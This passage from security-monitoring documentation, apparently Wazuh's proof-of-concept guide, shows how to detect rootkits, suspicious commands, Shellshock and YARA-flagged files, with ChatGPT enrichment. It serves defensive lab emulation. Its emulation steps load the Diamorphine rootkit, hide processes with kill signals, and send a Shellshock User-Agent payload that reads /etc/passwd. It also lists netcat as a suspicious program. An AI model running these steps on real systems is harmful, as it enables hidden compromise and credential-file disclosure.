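    for pid in range(1, 32768):
        try:
            os.kill(pid, 0)          # signal 0 only checks whether the PID exists
        except ProcessLookupError:
            continue                 # no such process
        except PermissionError:
            pass                     # the process exists but belongs to another user
        if pid not in visible:
            print(f"Possible hidden process: PID {pid}")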

The Malware detection section of our documentation contains more details about how Wazuh detects malware and about the rootcheck module.

Infrastructure

Endpoint: Ubuntu 22.04

Description: On this endpoint, download, compile, and load a rootkit. Then, configure the Wazuh rootcheck module for anomaly detection.

Configuration

Perform the following steps on the Ubuntu endpoint to emulate a rootkit, and to run a rootcheck scan to detect it.

  1. Switch to the root user and update the package lists on this endpoint:

    $ sudo su
    # apt update
    
  2. Install packages required for building the rootkit:

    # apt -y install gcc git
    
  3. Next, configure the Wazuh agent to run rootcheck scans every two minutes. In the /var/ossec/etc/ossec.conf file, set the <frequency> option in the <rootcheck> section to 120:

    <rootcheck>
      <disabled>no</disabled>
      <check_dev>yes</check_dev>
      <check_sys>yes</check_sys>
      <check_pids>yes</check_pids>
      <check_ports>yes</check_ports>
      <check_if>yes</check_if>
    
      <!-- rootcheck execution frequency - every 12 hours by default-->
    
      <frequency>120</frequency>
    
      <skip_nfs>yes</skip_nfs>
    </rootcheck>
    
  4. Restart the Wazuh agent to apply the changes:

    # systemctl restart wazuh-agent
    
Attack emulation
Ubuntu endpoint
  1. Fetch the Diamorphine rootkit source code from GitHub:

    # git clone https://github.com/m0nad/Diamorphine
    
  2. Navigate to the Diamorphine directory and compile the source code:

    # cd Diamorphine
    # make
    
  3. Load the rootkit kernel module:

    # insmod diamorphine.ko
    

    The kernel-level rootkit “Diamorphine” is now installed on the Ubuntu endpoint.

    Note

    Depending on the environment, the module sometimes fails to load or function properly. If you receive the error insmod: ERROR: could not insert module diamorphine.ko: Invalid parameters in the last step, you can restart the Linux endpoint and try again. Sometimes it takes several tries for it to work.

  4. Send kill signal 63 to the PID of any process running on the Ubuntu endpoint. This unhides the Diamorphine rootkit. By default, Diamorphine hides itself, so the lsmod command does not show it until the signal is sent. Try it out:

    # lsmod | grep diamorphine
    # kill -63 509
    # lsmod | grep diamorphine
    
    diamorphine            13155  0
    

    The first lsmod command returns an empty output because the module is hidden; after the signal is sent, the second lsmod command shows it. In the case of Diamorphine, a kill signal 63 sent to any PID, whether the process exists or not, toggles the kernel module between hidden and unhidden.

  5. Run the following commands to see how the rsyslogd process is first visible and then no longer visible. This rootkit allows you to hide selected processes from the ps command. Sending a kill signal 31 hides/unhides any process.

    # ps auxw | grep rsyslogd | grep -v grep
    
    root       732  0.0  0.7 214452  3572 ?        Ssl  14:53   0:00 /usr/sbin/rsyslogd -n
    
    # kill -31 <PID_OF_RSYSLOGD>
    # ps auxw | grep rsyslog | grep -v grep
    

    When using this last command, you can expect an empty output.

The next rootcheck scan will run and alert us about the rsyslogd process which was hidden with the Diamorphine rootkit.

Visualize the alerts

You can visualize the alert data in the Wazuh dashboard. To do this, go to the Threat Hunting module and add the filters in the search bar to query the alerts.

  • rule.groups:rootcheck

Remember, if you run the same kill -31 command as before against rsyslogd, the rsyslogd process becomes visible again. The subsequent rootcheck scan would no longer generate alerts about it.

Monitoring execution of malicious commands

Auditd is an auditing utility native to Linux systems. It records actions and changes on a Linux endpoint.

In this use case, you configure Auditd on an Ubuntu endpoint to record all commands executed by a given user. This includes commands run by the user with sudo or after changing to the root user. You then configure a custom Wazuh rule to alert on suspicious commands.

Consider reading the Monitoring system calls section to get a broader picture of how to take advantage of this capability.

Infrastructure

Endpoint: Ubuntu 22.04

Description: On this endpoint, you configure Auditd to monitor the execution of malicious commands. You then use the Wazuh CDB list lookup capability to create a list of potentially malicious commands that can be run on it.

Configuration
Ubuntu endpoint

Perform the following steps to install Auditd and create the necessary audit rules to query all commands run by a privileged user.

  1. Install, start and enable Auditd if it’s not present on the endpoint:

    $ sudo apt -y install auditd
    $ sudo systemctl start auditd
    $ sudo systemctl enable auditd
    
  2. As the root user, execute the following commands to append audit rules to the /etc/audit/audit.rules file. The rules track the user whose audit UID (auid) is 1000, typically the first non-root user created on the system; adjust this value if your user has a different UID:

    # echo "-a exit,always -F auid=1000 -F egid!=994 -F auid!=-1 -F arch=b32 -S execve -k audit-wazuh-c" >> /etc/audit/audit.rules
    # echo "-a exit,always -F auid=1000 -F egid!=994 -F auid!=-1 -F arch=b64 -S execve -k audit-wazuh-c" >> /etc/audit/audit.rules
    
  3. Reload the rules and confirm that they are in place:

    # sudo auditctl -R /etc/audit/audit.rules
    # sudo auditctl -l
    
    -a always,exit -F arch=b32 -S execve -F auid=1000 -F egid!=994 -F auid!=-1 -F key=audit-wazuh-c
    -a always,exit -F arch=b64 -S execve -F auid=1000 -F egid!=994 -F auid!=-1 -F key=audit-wazuh-c
    
  4. Add the following configuration to the Wazuh agent /var/ossec/etc/ossec.conf file. This allows the Wazuh agent to read the auditd logs file:

    <localfile>
      <log_format>audit</log_format>
      <location>/var/log/audit/audit.log</location>
    </localfile>
    
  5. Restart the Wazuh agent:

    $ sudo systemctl restart wazuh-agent
    
Wazuh server

Perform the following steps to create a CDB list of malicious programs and rules to detect the execution of the programs in the list.

  1. Look over the key-value pairs in the lookup file /var/ossec/etc/lists/audit-keys.

    audit-wazuh-w:write
    audit-wazuh-r:read
    audit-wazuh-a:attribute
    audit-wazuh-x:execute
    audit-wazuh-c:command
    

    This CDB list contains keys and values separated by colons.

    Note

    Wazuh allows you to maintain flat file CDB lists which must be key only or key:value pairs. These are compiled into a special binary format to facilitate high-performance lookups in Wazuh rules. Such lists must be created as files, added to the Wazuh configuration, and then compiled. After that, rules can be built to look up decoded fields in those CDB lists as part of their match criteria. For example, in addition to the text file /var/ossec/etc/lists/audit-keys, there is also a binary /var/ossec/etc/lists/audit-keys.cdb file that Wazuh uses for actual lookups.

  2. Create a CDB list file /var/ossec/etc/lists/suspicious-programs with the following content:

    ncat:yellow
    nc:red
    tcpdump:orange
    
  3. Add the list to the <ruleset> section of the Wazuh server /var/ossec/etc/ossec.conf file:

    <list>etc/lists/suspicious-programs</list>
    
  4. Create a high severity rule to fire when a "red" program is executed. Add this new rule to the /var/ossec/etc/rules/local_rules.xml file on the Wazuh server.

    <group name="audit">
      <rule id="100210" level="12">
          <if_sid>80792</if_sid>
      <list field="audit.command" lookup="match_key_value" check_value="red">etc/lists/suspicious-programs</list>
        <description>Audit: Highly Suspicious Command executed: $(audit.exe)</description>
          <group>audit_command,</group>
      </rule>
    </group>
    
  5. Restart the Wazuh manager:

    $ sudo systemctl restart wazuh-manager
    
Attack emulation
  1. On the Ubuntu endpoint, install and run netcat, a program tagged as "red" in the CDB list:

    $ sudo apt -y install netcat
    # nc -v
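
    If you want to confirm locally that Auditd recorded the execution before checking the dashboard, you can search the audit log by the rule key defined earlier:

    $ sudo ausearch -k audit-wazuh-c -ts recent -i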
    
Visualize the alerts

You can visualize the alert data in the Wazuh dashboard. To do this, go to the Threat Hunting module and add the filters in the search bar to query the alerts.

  • data.audit.command:nc

Detecting a Shellshock attack

Wazuh is capable of detecting a Shellshock attack by analyzing web server logs collected from a monitored endpoint. In this use case, you set up an Apache web server on the Ubuntu endpoint and simulate a Shellshock attack.

Infrastructure

Endpoint: Ubuntu 22.04

Description: Victim endpoint running an Apache 2.4.54 web server.

Endpoint: RHEL 9.0

Description: This attacker endpoint sends a malicious HTTP request to the victim's web server.

Configuration
Ubuntu endpoint

Perform the following steps to install an Apache web server and monitor its logs with the Wazuh agent.

  1. Update local packages and install the Apache web server:

    $ sudo apt update
    $ sudo apt install apache2
    
  2. If a firewall is enabled, modify it to allow external access to web ports. Skip this step if the firewall is disabled:

    $ sudo ufw app list
    $ sudo ufw allow 'Apache'
    $ sudo ufw status
    
  3. Check that the Apache web server is running:

    $ sudo systemctl status apache2
    
  4. Add the following lines to the Wazuh agent /var/ossec/etc/ossec.conf configuration file. This sets the Wazuh agent to monitor the access logs of your Apache server:

    <localfile>
        <log_format>syslog</log_format>
        <location>/var/log/apache2/access.log</location>
    </localfile>
    
  5. Restart the Wazuh agent to apply the configuration changes:

    $ sudo systemctl restart wazuh-agent
    
Attack emulation
  1. Replace <WEBSERVER_IP_ADDRESS> with the Ubuntu IP address and execute the following command from the attacker endpoint:

    $ sudo curl -H "User-Agent: () { :; }; /bin/cat /etc/passwd" <WEBSERVER_IP_ADDRESS>
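
    On the victim endpoint, the request is recorded in /var/log/apache2/access.log as a line similar to the following (field values are illustrative). The "() { :; };" sequence in the User-Agent field is the pattern that identifies the Shellshock attempt:

    203.0.113.10 - - [01/Jan/2024:10:15:00 +0000] "GET / HTTP/1.1" 200 10956 "-" "() { :; }; /bin/cat /etc/passwd"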
    
Visualize the alerts

You can visualize the alert data in the Wazuh dashboard. To do this, go to the Threat Hunting module and add the filters in the search bar to query the alerts.

  • rule.description:Shellshock attack detected

  • If you have Suricata monitoring the endpoint traffic, you can also query rule.description:*CVE-2014-6271* for the related Suricata alerts.

Leveraging LLMs for alert enrichment

A Large Language Model (LLM) is a type of artificial intelligence (AI) model designed to understand, generate, and manipulate human language. These models are typically built using machine learning techniques, particularly deep learning and neural networks. LLMs can add human-like intelligence to data processing, enhancing the efficiency of various business and personal operations. LLMs such as the ones behind ChatGPT have gained massive popularity and are widely used across various industries, including security operations.

YARA is a tool that detects and classifies malware artifacts. While YARA can identify known patterns and signatures of malicious activity, human intervention is often required to interpret and contextualize the output of YARA scans. ChatGPT is a generative AI chatbot developed by OpenAI. It provides users with various LLMs to process data. These LLMs can analyze and enrich YARA alerts with additional context, providing security teams with deeper insights into the nature and severity of detected threats.

In this use case, we integrate Wazuh with YARA to detect when a malicious file is added to a monitored endpoint. The integration utilizes the Wazuh FIM module to monitor a directory for new or modified files. When a file modification or addition is detected, the Wazuh Active Response module triggers a YARA scan on the file. The Active Response module automatically deletes the malicious file from the endpoint if it has a positive match with a malicious signature. The Active Response module then queries ChatGPT to enrich the YARA scan result with additional insight into the malicious file that helps security teams understand its nature, potential impact, and remediation.

Infrastructure

Endpoint: Ubuntu 22.04

Description: Monitored endpoint configured with the Wazuh File Integrity Monitoring (FIM) module and YARA integration with ChatGPT log enrichment.

Endpoint: Windows 11

Description: Monitored endpoint configured with the Wazuh File Integrity Monitoring (FIM) module and YARA integration with ChatGPT log enrichment.

Configuration

Perform the following steps to set up the YARA and ChatGPT integration. Choose either Ubuntu or Windows configuration depending on the operating system of the monitored endpoint.

Ubuntu 22.04 endpoint

Perform the following steps to install YARA and configure the Active Response and FIM modules.

  1. Download, compile, and install YARA:

    $ sudo apt update
    $ sudo apt install -y make gcc autoconf libtool libssl-dev pkg-config jq
    $ sudo curl -LO https://github.com/VirusTotal/yara/archive/v4.5.1.tar.gz
    $ sudo tar -xvzf v4.5.1.tar.gz -C /usr/local/bin/ && rm -f v4.5.1.tar.gz
    $ cd /usr/local/bin/yara-4.5.1/
    $ sudo ./bootstrap.sh && sudo ./configure && sudo make && sudo make install && sudo make check
    $ sudo ldconfig
    
  2. Test that YARA is running properly:

    $ yara
    
    yara: wrong number of arguments
    Usage: yara [OPTION]... [NAMESPACE:]RULES_FILE... FILE | DIR | PID
    
    Try `--help` for more options
    
  3. Download YARA detection rules using valhallaAPI. Valhalla is a YARA and Sigma rule repository provided by Nextron Systems:

    $ sudo mkdir -p /var/ossec/active-response/yara/rules
    $ sudo curl 'https://valhalla.nextron-systems.com/api/v1/get' \
    -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' \
    -H 'Accept-Language: en-US,en;q=0.5' \
    --compressed \
    -H 'Referer: https://valhalla.nextron-systems.com/' \
    -H 'Content-Type: application/x-www-form-urlencoded' \
    -H 'DNT: 1' -H 'Connection: keep-alive' -H 'Upgrade-Insecure-Requests: 1' \
    --data 'demo=demo&apikey=1111111111111111111111111111111111111111111111111111111111111111&format=text' \
    -o /var/ossec/active-response/yara/rules/yara_rules.yar
    
  4. Change the owner of the yara_rules.yar file to root:wazuh, and the file permissions to 750:

    $ sudo chown root:wazuh /var/ossec/active-response/yara/rules/yara_rules.yar
    $ sudo chmod 750 /var/ossec/active-response/yara/rules/yara_rules.yar
    

    Note

    If you use a custom YARA rule, ensure that the description field is present in the YARA rule metadata, as this field is required to enrich the alert with ChatGPT (an example rule is shown at the end of this list).

  5. Create a script yara.sh in the /var/ossec/active-response/bin/ directory. This script runs YARA scans on files added or modified in the monitored directories. It also queries ChatGPT to enrich the logs and attempts to remove malware files detected by YARA.

    Replace <API_KEY> with your OpenAI API key and <OPENAI_MODEL> with your preferred OpenAI model. The model used in this POC guide is gpt-4-turbo:

    #!/bin/bash
    # Wazuh - YARA active response
    # Copyright (C) 2015-2024, Wazuh Inc.
    #
    # This program is free software; you can redistribute it
    # and/or modify it under the terms of the GNU General Public
    # License (version 2) as published by the FSF - Free Software
    # Foundation.
    
    
    #------------------------- Configuration -------------------------#
    
    # ChatGPT API key
    API_KEY="<API_KEY>"
    OPENAI_MODEL="<OPENAI_MODEL>" #for example gpt-4-turbo
    
    
    # Set LOG_FILE path
    LOG_FILE="logs/active-responses.log"
    
    #------------------------- Gather parameters -------------------------#
    
    # Extra arguments
    read INPUT_JSON
    YARA_PATH=$(echo $INPUT_JSON | jq -r .parameters.extra_args[1])
    YARA_RULES=$(echo $INPUT_JSON | jq -r .parameters.extra_args[3])
    FILENAME=$(echo $INPUT_JSON | jq -r .parameters.alert.syscheck.path)
    
    size=0
    actual_size=$(stat -c %s ${FILENAME})
    while [ ${size} -ne ${actual_size} ]; do
        sleep 1
        size=${actual_size}
        actual_size=$(stat -c %s ${FILENAME})
    done
    
    #----------------------- Analyze parameters -----------------------#
    
    if [[ ! $YARA_PATH ]] || [[ ! $YARA_RULES ]]
    then
        echo "wazuh-YARA: ERROR - YARA active response error. YARA path and rules parameters are mandatory." >> ${LOG_FILE}
        exit 1
    fi
    
    #------------------------- Main workflow --------------------------#
    
    # Execute YARA scan on the specified filename
    YARA_output="$("${YARA_PATH}"/yara -w -r -m "$YARA_RULES" "$FILENAME")"
    
    if [[ $YARA_output != "" ]]
    then
        # Attempt to delete the file if any YARA rule matches
        if rm -rf "$FILENAME"; then
            echo "wazuh-YARA: INFO - Successfully deleted $FILENAME" >> ${LOG_FILE}
        else
            echo "wazuh-YARA: INFO - Unable to delete $FILENAME" >> ${LOG_FILE}
        fi
    
        # Flag to check if API key is invalid
        api_key_invalid=false
    
        # Iterate every detected rule
        while read -r line; do
            # Extract the description from the line using regex
            description=$(echo "$line" | grep -oP '(?<=description=").*?(?=")')
            if [[ $description != "" ]]; then
                # Prepare the message payload for ChatGPT
                payload=$(jq -n \
                    --arg desc "$description" \
                    --arg model "$OPENAI_MODEL" \
                    '{
                        model: $model,
                        messages: [
                            {
                                role: "system",
                                content: "In one paragraph, tell me about the impact and how to mitigate \($desc)"
                            }
                        ],
                        temperature: 1,
                        max_tokens: 256,
                        top_p: 1,
                        frequency_penalty: 0,
                        presence_penalty: 0
                    }')
    
                # Query ChatGPT for more information
                chatgpt_response=$(curl -s -X POST "https://api.openai.com/v1/chat/completions" \
                    -H "Content-Type: application/json" \
                    -H "Authorization: Bearer $API_KEY" \
                    -d "$payload")
    
                # Check for invalid API key error
                if echo "$chatgpt_response" | grep -q "invalid_request_error"; then
                    api_key_invalid=true
                    echo "wazuh-YARA: ERROR - Invalid ChatGPT API key" >> ${LOG_FILE}
                    # Log Yara scan result without ChatGPT response
                    echo "wazuh-YARA: INFO - Scan result: $line | chatgpt_response: none" >> ${LOG_FILE}
                else
                    # Extract the response text from ChatGPT API response
                    response_text=$(echo "$chatgpt_response" | jq -r '.choices[0].message.content')
    
                    # Check if the response text is null and handle the error
                    if [[ $response_text == "null" ]]; then
                        echo "wazuh-YARA: ERROR - ChatGPT API returned null response: $chatgpt_response" >> ${LOG_FILE}
                    else
                        # Combine the YARA scan output and ChatGPT response
                        combined_output="wazuh-YARA: INFO - Scan result: $line | chatgpt_response: $response_text"
    
                        # Append the combined output to the log file
                        echo "$combined_output" >> ${LOG_FILE}
                    fi
                fi
            else
                echo "wazuh-YARA: INFO - Scan result: $line" >> ${LOG_FILE}
            fi
        done <<< "$YARA_output"
    
        # If API key was invalid, log a specific message
        if $api_key_invalid; then
            echo "wazuh-YARA: INFO - API key is invalid. ChatGPT response omitted." >> ${LOG_FILE}
        fi
    else
        echo "wazuh-YARA: INFO - No YARA rule matched." >> ${LOG_FILE}
    fi
    
    exit 0;
    

    Note

    If the supplied <API_KEY> is invalid, Wazuh triggers an alert with the value of the chatgpt_response field set to None. Logs about the invalid API key are in the /var/ossec/logs/active-responses.log file.

  6. Change the owner of the yara.sh script to root:wazuh, and the file permissions to 750:

    $ sudo chown root:wazuh /var/ossec/active-response/bin/yara.sh
    $ sudo chmod 750 /var/ossec/active-response/bin/yara.sh
    
  7. Add the following within the <syscheck> block of the Wazuh agent /var/ossec/etc/ossec.conf configuration file to monitor the /home directory:

    <directories realtime="yes">/home</directories>
    
  8. Restart the Wazuh agent to apply the configuration changes:

    $ sudo systemctl restart wazuh-agent
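
As referenced in the note of step 4, a custom YARA rule must carry a description metadata field for the ChatGPT enrichment to work. A minimal illustrative rule (the name, string, and metadata values are examples, not a real detection):

    rule Example_Enrichment_Test {
        meta:
            description = "Illustrative rule used to test the ChatGPT enrichment"
            author = "Example author"
        strings:
            $marker = "malicious-test-marker"
        condition:
            $marker
    }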
    
Windows 11 endpoint

Perform the following steps to install Python, YARA, and download YARA rules.

  1. Download the Python executable installer from the official Python website.

  2. Run the Python installer once downloaded, and make sure to check the following boxes:

    • Install launcher for all users

    • Add python.exe to PATH. This places the Python interpreter in the execution path.

  3. Download and install the latest Visual C++ Redistributable package.

  4. Open PowerShell with administrator privileges to download and extract YARA:

    > Invoke-WebRequest -Uri https://github.com/VirusTotal/yara/releases/download/v4.5.1/yara-v4.5.1-2298-win64.zip -OutFile yara-v4.5.1-2298-win64.zip
    > Expand-Archive yara-v4.5.1-2298-win64.zip; Remove-Item yara-v4.5.1-2298-win64.zip
    
  5. Create a directory called C:\Program Files (x86)\ossec-agent\active-response\bin\yara\ and copy the YARA executable into it:

    > mkdir 'C:\Program Files (x86)\ossec-agent\active-response\bin\yara\'
    > cp .\yara-v4.5.1-2298-win64\yara64.exe 'C:\Program Files (x86)\ossec-agent\active-response\bin\yara\'
    
  6. Download YARA rules using valhallaAPI. Valhalla is a YARA and Sigma rule repository provided by Nextron Systems:

    > python -m pip install valhallaAPI
    > python -c "from valhallaAPI.valhalla import ValhallaAPI; v = ValhallaAPI(api_key='1111111111111111111111111111111111111111111111111111111111111111'); response = v.get_rules_text(); open('yara_rules.yar', 'w').write(response)"
    > mkdir 'C:\Program Files (x86)\ossec-agent\active-response\bin\yara\rules\'
    > cp yara_rules.yar 'C:\Program Files (x86)\ossec-agent\active-response\bin\yara\rules\'
    

    Note

    If you use a custom YARA rule, ensure that the description field in the YARA rule metadata is present, as this field is required to enrich the alert with ChatGPT.

  7. Create a script yara.py in the C:\Program Files (x86)\ossec-agent\active-response\bin\ directory. This script runs a YARA scan against any file modified or added to the monitored directory. It also queries ChatGPT to enrich the logs and attempts to remove malware files detected by YARA. Replace <API_KEY> with your OpenAI API key and <OPENAI_MODEL> with your preferred OpenAI model. The model used in this POC guide is gpt-4-turbo:

    import os
    import subprocess
    import json
    import re
    import requests
    
    API_KEY = '<API_KEY>'
    OPENAI_MODEL='<OPENAI_MODEL>' #for example gpt-4-turbo
    
    # Determine OS architecture and set log file path
    if os.environ['PROCESSOR_ARCHITECTURE'].endswith('86'):
        log_file_path = os.path.join(os.environ['ProgramFiles'], 'ossec-agent', 'active-response', 'active-responses.log')
    else:
        log_file_path = os.path.join(os.environ['ProgramFiles(x86)'], 'ossec-agent', 'active-response', 'active-responses.log')
    
    def log_message(message):
        with open(log_file_path, 'a') as log_file:
            log_file.write(message + '\n')
    
    def read_input():
        return input()
    
    def get_syscheck_file_path(json_file_path):
        with open(json_file_path, 'r') as json_file:
            data = json.load(json_file)
            return data['parameters']['alert']['syscheck']['path']
    
    def run_yara_scan(yara_exe_path, yara_rules_path, syscheck_file_path):
        try:
            result = subprocess.run([yara_exe_path, '-m', yara_rules_path, syscheck_file_path], capture_output=True, text=True)
            return result.stdout.strip()
        except Exception as e:
            log_message(f"Error running Yara scan: {str(e)}")
            return None
    
    def extract_description(yara_output):
        match = re.search(r'description="([^"]+)"', yara_output)
        if match:
            return match.group(1)
        else:
            return None
    
    def query_chatgpt(description):
        headers = {
            'Authorization': f'Bearer {API_KEY}',
            'Content-Type': 'application/json'
        }
        data = {
            'model': OPENAI_MODEL,
            'messages': [{'role': 'system', 'content': f'In one paragraph, tell me about the impact and how to mitigate {description}'}],
            'temperature': 1,
            'max_tokens': 256,
            'top_p': 1,
            'frequency_penalty': 0,
            'presence_penalty': 0
        }
        response = requests.post('https://api.openai.com/v1/chat/completions', headers=headers, json=data)
        if response.status_code == 200:
            return response.json()['choices'][0]['message']['content']
        elif response.status_code == 401:  # Unauthorized (invalid API key)
            log_message("wazuh-YARA: ERROR - Invalid ChatGPT API key")
            return None
        else:
            log_message(f"Error querying ChatGPT: {response.status_code} {response.text}")
            return None
    
    def main():
        json_file_path = r"C:\Program Files (x86)\ossec-agent\active-response\stdin.txt"
        yara_exe_path = r"C:\Program Files (x86)\ossec-agent\active-response\bin\yara\yara64.exe"
        yara_rules_path = r"C:\Program Files (x86)\ossec-agent\active-response\bin\yara\rules\yara_rules.yar"
    
        input_data = read_input()
    
        with open(json_file_path, 'w') as json_file:
            json_file.write(input_data)
    
        syscheck_file_path = get_syscheck_file_path(json_file_path)
    
        yara_output = run_yara_scan(yara_exe_path, yara_rules_path, syscheck_file_path)
        if yara_output is not None:
            description = extract_description(yara_output)
    
            if description:
                chatgpt_response = query_chatgpt(description)
                if chatgpt_response:
                    combined_output = f"wazuh-YARA: INFO - Scan result: {yara_output} | chatgpt_response: {chatgpt_response}"
                    log_message(combined_output)
                else:
                    # Log the Yara scan result without the ChatGPT response
                    log_message(f"wazuh-YARA: INFO - Scan result: {yara_output} | chatgpt_response: None")
    
                # Delete the scanned file if a description is found
                try:
                    os.remove(syscheck_file_path)
                    if not os.path.exists(syscheck_file_path):
                        log_message(f"wazuh-YARA: INFO - Successfully deleted {syscheck_file_path}")
                    else:
                        log_message(f"wazuh-YARA: INFO - Unable to delete {syscheck_file_path}")
                except Exception as e:
                    log_message(f"Error deleting file: {str(e)}")
            else:
                log_message("Failed to extract description from Yara output.")
        else:
            log_message("Yara scan returned no output.")
    
    if __name__ == "__main__":
        main()
    

    Note

    If the supplied <API_KEY> is invalid, Wazuh triggers an alert with the value of the chatgpt_response field set to None. You can find logs about the invalid API key in the C:\Program Files (x86)\ossec-agent\active-response\active-responses.log file.

  8. Run the following command using PowerShell to convert the yara.py script to an executable file:

    > pip install pyinstaller
    > pyinstaller -F "C:\Program Files (x86)\ossec-agent\active-response\bin\yara.py"
    

    This creates a yara.exe executable in the C:\Users\<USER>\dist\ directory.

    Note

    If you run the above commands as Administrator, the executable file will be in the C:\Windows\System32\dist directory.

  9. Copy the yara.exe executable file to the C:\Program Files (x86)\ossec-agent\active-response\bin\ directory on the monitored endpoint.

  10. Add the following within the <syscheck> block of the Wazuh agent C:\Program Files (x86)\ossec-agent\ossec.conf configuration file to monitor the Downloads directory of every user:

    <directories realtime="yes">C:\Users\*\Downloads</directories>
    
  11. Restart the Wazuh agent to apply the configuration changes:

    > Restart-Service -Name wazuh
    
Wazuh server

Perform the following steps on the Wazuh server to configure custom rules, decoders, and the Active Response module.

  1. Add the following decoders to the Wazuh server /var/ossec/etc/decoders/local_decoder.xml file to parse the data in YARA scan results:

    <!--
      YARA Decoder
    -->
    
    <decoder name="YARA_decoder">
      <prematch>wazuh-YARA:</prematch>
    </decoder>
    
    <decoder name="YARA_child">
      <parent>YARA_decoder</parent>
      <regex type="pcre2">wazuh-YARA: (\S+)</regex>
      <order>YARA.log_type</order>
    </decoder>
    
    <decoder name="YARA_child">
      <parent>YARA_decoder</parent>
      <regex type="pcre2">Scan result: (\S+)\s+</regex>
      <order>YARA.rule_name</order>
    </decoder>
    
    <decoder name="YARA_child">
      <parent>YARA_decoder</parent>
      <regex type="pcre2">\[description="([^"]+)",</regex>
      <order>YARA.rule_description</order>
    </decoder>
    
    <decoder name="YARA_child">
      <parent>YARA_decoder</parent>
      <regex type="pcre2">author="([^"]+)",</regex>
      <order>YARA.rule_author</order>
    </decoder>
    
    <decoder name="YARA_child">
      <parent>YARA_decoder</parent>
      <regex type="pcre2">reference="([^"]+)",</regex>
      <order>YARA.reference</order>
    </decoder>
    
    <decoder name="YARA_child">
      <parent>YARA_decoder</parent>
      <regex type="pcre2">date="([^"]+)",</regex>
      <order>YARA.published_date</order>
    </decoder>
    
    <decoder name="YARA_child">
      <parent>YARA_decoder</parent>
      <regex type="pcre2">score =(\d+),</regex>
      <order>YARA.threat_score</order>
    </decoder>
    
    <decoder name="YARA_child">
      <parent>YARA_decoder</parent>
      <regex type="pcre2">customer="([^"]+)",</regex>
      <order>YARA.api_customer</order>
    </decoder>
    
    <decoder name="YARA_child">
      <parent>YARA_decoder</parent>
      <regex type="pcre2">hash1="([^"]+)",</regex>
      <order>YARA.file_hash</order>
    </decoder>
    
    <decoder name="YARA_child">
      <parent>YARA_decoder</parent>
      <regex type="pcre2">tags="([^"]+)",</regex>
      <order>YARA.tags</order>
    </decoder>
    
    <decoder name="YARA_child">
      <parent>YARA_decoder</parent>
      <regex type="pcre2">minimum_YARA="([^"]+)"\]</regex>
      <order>YARA.minimum_YARA_version</order>
    </decoder>
    
    <decoder name="YARA_child">
      <parent>YARA_decoder</parent>
      <regex type="pcre2">\] (.*) \|</regex>
      <order>YARA.scanned_file</order>
    </decoder>
    
    <decoder name="YARA_child">
      <parent>YARA_decoder</parent>
      <regex type="pcre2">chatgpt_response: (.*)</regex>
      <order>YARA.chatgpt_response</order>
    </decoder>
    
    <decoder name="YARA_child">
      <parent>YARA_decoder</parent>
      <regex type="pcre2">Successfully deleted (.*)</regex>
      <order>YARA.file_deleted</order>
    </decoder>
    
    <decoder name="YARA_child">
      <parent>YARA_decoder</parent>
      <regex type="pcre2">Unable to delete (.*)</regex>
      <order>YARA.file_not_deleted</order>
    </decoder>
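
    The decoders above parse log lines in the format that the yara.py script builds in the combined_output string. As a quick sanity check, the hypothetical sketch below applies a few of the same patterns to a sample log line with Python's re module (close enough to PCRE2 for these expressions); all sample values are made up for illustration.

    import re

    # Hypothetical log line in the format produced by yara.py (values are illustrative only).
    sample = (
        'wazuh-YARA: INFO - Scan result: Mirai_Botnet_Malware '
        '[description="Detects Mirai Botnet Malware",author="Example Author",'
        'reference="Internal Research",date="2016-10-04"] '
        'C:\\Users\\demo\\Downloads\\mirai | chatgpt_response: Mirai is a botnet that ...'
    )

    # A subset of the decoder patterns above, keyed by the field each one populates.
    patterns = {
        "YARA.log_type": r"wazuh-YARA: (\S+)",
        "YARA.rule_name": r"Scan result: (\S+)\s+",
        "YARA.rule_description": r'\[description="([^"]+)",',
        "YARA.scanned_file": r"\] (.*) \|",
        "YARA.chatgpt_response": r"chatgpt_response: (.*)",
    }

    for field, pattern in patterns.items():
        match = re.search(pattern, sample)
        print(field, "->", match.group(1) if match else None)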
    
  2. Add the following rules to the /var/ossec/etc/rules/local_rules.xml file. These rules detect FIM events in the monitored directories and trigger the YARA Active Response script, which deletes files identified as malicious.

    <group name="syscheck,">
      <rule id="100300" level="5">
        <if_sid>550</if_sid>
        <field name="file">/home</field>
        <description>File modified in /home directory.</description>
      </rule>
    
      <rule id="100301" level="5">
        <if_sid>554</if_sid>
        <field name="file">/home</field>
        <description>File added to /home directory.</description>
      </rule>
      <rule id="100302" level="5">
        <if_sid>550</if_sid>
        <field name="file" type="pcre2">(?i)C:\\Users.+Downloads</field>
        <description>File modified in the downloads directory.</description>
      </rule>
    
      <rule id="100303" level="5">
        <if_sid>554</if_sid>
        <field name="file" type="pcre2">(?i)C:\\Users.+Downloads</field>
        <description>File added to the downloads directory.</description>
      </rule>
    </group>
    
    <group name="yara,">
      <rule id="108000" level="0">
        <decoded_as>YARA_decoder</decoded_as>
        <description>YARA grouping rule</description>
      </rule>
      <rule id="108001" level="10">
        <if_sid>108000</if_sid>
        <match>wazuh-YARA: INFO - Scan result: </match>
        <description>File "$(YARA.scanned_file)" is a positive match for YARA rule: $(YARA.rule_name)</description>
      </rule>
    
      <rule id="108002" level="5">
        <if_sid>108000</if_sid>
        <field name="yara.file_deleted">\.</field>
        <description>Active response successfully removed malicious file "$(YARA.file_deleted)"</description>
      </rule>
    
      <rule id="108003" level="12">
        <if_sid>108000</if_sid>
        <field name="YARA.file_not_deleted">\.</field>
        <description>Active response unable to delete malicious file "$(YARA.file_not_deleted)"</description>
      </rule>
    </group>
    
  3. Add the following configuration to the Wazuh server /var/ossec/etc/ossec.conf configuration file. This configures the Active Response module to trigger after the rules with ID 100300, 100301, 100302, and 100303 are fired:

    <ossec_config>
      <command>
        <name>yara_windows</name>
        <executable>yara.exe</executable>
        <timeout_allowed>no</timeout_allowed>
      </command>
    
      <command>
        <name>yara_linux</name>
        <executable>yara.sh</executable>
        <extra_args>-yara_path /usr/local/bin -yara_rules /var/ossec/active-response/yara/rules/yara_rules.yar</extra_args>
        <timeout_allowed>no</timeout_allowed>
      </command>
    
      <active-response>
        <disabled>no</disabled>
        <command>yara_linux</command>
        <location>local</location>
        <rules_id>100300,100301</rules_id>
      </active-response>
    
      <active-response>
        <disabled>no</disabled>
        <command>yara_windows</command>
        <location>local</location>
        <rules_id>100302,100303</rules_id>
      </active-response>
    </ossec_config>
    
  4. Restart the Wazuh manager to apply the configuration changes:

    $ sudo systemctl restart wazuh-manager
    
Testing the configuration
Ubuntu 22.04 endpoint

